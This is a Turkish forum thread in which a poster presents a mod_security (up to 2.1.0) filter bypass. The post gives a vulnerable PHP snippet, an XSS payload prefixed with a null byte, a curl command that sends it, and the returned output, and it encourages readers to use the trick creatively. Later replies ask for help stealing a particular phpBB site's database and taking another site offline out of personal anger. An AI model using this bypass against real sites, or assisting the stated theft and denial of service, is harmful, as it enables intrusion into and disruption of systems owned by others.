PHP De Mod_Security <= 2.1.0 Atlatma [6 Mart]

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Erkek

mod_security 2.1.0 ve aşağısındaki tüm sürümlerde bulunan süper açık el yapımı mod_security e güvenen tüm php coderlarını kara kara düşündürücek nitelikte :)

olay şöyle;
    diyelimki bir php kodumuz var
    <?php
      if (isset($_POST['var'])
        echo($_POST['var']);
    ?>
    şeklinde gelen bütün postları ekrana yazdırıyoruz.

mod_security aktif diyelim... sayfaya post olarak

&var=<script>alert(/xss/);</script>

verisini gönderdik.. default configde ayar yoksa kodumuz çıkıcaktır yine.. yada engellenebilinir mod_security tarafından engellenmese bile log dosyasında XSS saldırısı olaiblir diye kayıt eklenicek.

buraya kadar herşey normal.. bu query mizin başına ascii 0 karakteri eklediğimizde mod_security i aşaibliyoruz !
    örnek olarak;

$ echo -e "\000&var=<script>alert(/xss/);</script>" > postdata
    $ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent
    <script>alert(/xss/);</script>

bu curl kullanan linuxcu abilerimiz için yabancı bi sitede hazırlanmış kod.. tabi aynı karakteri windowsdada hazırlayıp post edebilirsiniz örneğin denyolaunch un test tuşu ile tek bir post verisi göndererek.. gersi sizin yaratıcılığınıza kalmış. :)

kaynak: http://www.php-security.org/MOPB/BONUS-12-2007.html

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Google
    Google's avatar
    Erkek
    ouww saol hoca işe yarar açık.

Abra Kadabra
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Lupin
    Lupin's avatar
    Erkek

Güzel tam anladığım gibi birşey olmuş da bunu farklı sürümlerde deneyemeyiz dimi ?

Mesela Php B.B. 2.0.22 de bir açık bulabilir miyiz ya da bu açığı bu sürümde de kullanabilir miyiz ?

Rus ile aldatmayanı etmeli takdir,tek biri ile uslanmayanın hakkı köçektir.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Tayok
    Tayok's avatar
    Erkek

ya ben anlamadım açıkçası ama sanırım önemli bir açık. Şimdi bir soru soracam ama diyeceksiniz ki biz amelemiyiz yada ezikmisin felan ben genede sormak istiyorum...

Ya bi forum var phpbb ve phpbb security mod yüklü. Ve o sitenin database sini elime geçirmem lazım çok güzel ve önemli bilgiler var sitede. Bu açıkla database ele geçirmem gibi bir olay söz konusu mu . Sanırım hayır amaemin olmadığım için cevabınızı bekliyorum.. 

5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Lupin
    Lupin's avatar
    Erkek

Tayok aynı durumu ben de yapmak istiyorum ve ben önce flood denemesi yapmak istedim ama phpbb olduğu için bunun koruması olduğunu öğrendim sonra..

Tabiki mantıklı olarak böyle bir açık bulma yoluna girdim..

Ben bilgileri ele geçirmek değil de direk olarak siteye erişimi engellemek istiyorum..
    Site hayatımı göçertti a.k..

Eğer bilgisi olan varsa bizlerle paylaşırsa sevinirim..

Sakın aklınıza sömürmek ya da parazit gibi yararlanmak gelmesin tamamen ihtiyacım olduğu için ve gerekli olduğu için istiyorum..

Saygılarımla..

Rus ile aldatmayanı etmeli takdir,tek biri ile uslanmayanın hakkı köçektir.
Toplam Hit: 2415 Toplam Mesaj: 5